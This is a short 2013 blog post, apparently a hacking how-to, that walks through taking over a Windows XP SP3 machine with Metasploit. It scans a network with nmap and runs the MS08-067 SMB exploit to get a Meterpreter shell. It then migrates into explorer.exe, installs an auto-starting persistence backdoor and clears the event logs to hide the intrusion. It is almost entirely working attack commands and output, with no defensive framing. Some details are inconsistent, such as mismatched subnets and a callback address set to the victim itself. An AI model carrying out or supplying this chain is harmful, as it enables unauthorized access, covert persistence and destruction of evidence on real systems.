Saturday, April 20, 2013

Hack Windows XP SP3 using Metaploit


######### H@cK  WinXP SP3 ###############

Scan IP/Computer for Attack
nmap -sP 172.15.5.0/24 
Check the type of the computer info:
nmap -sS -Pn -A 172.16.5.131
[ After searching, I select IP 172.16.5.131[XP-SP3 (nmap -A 172.16.5.131) ] for Attack]
Start Metaploit console in Ubuntu by issue command: sudo msfconsole
-----------------------------------------------------------------------------------------
1. msf > use exploit/windows/smb/ms08_067_netapi
2. msf  exploit(ms08_067_netapi) > set RHOST 172.16.5.131
3. msf  exploit(ms08_067_netapi) > exploit
4. meterpreter > migrate 212   (212 is the PID of  explorer.exe)
5. meterpreter > sysinfo
Computer        : VANNAK-D835B763
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
------------------------------------------------------------------------------------------
6. meterpreter > run persistence -h
7. meterpreter > run persistence -A -X -p 10000 -r 172.16.5.131
8. meterpreter > clearev


No comments:

Post a Comment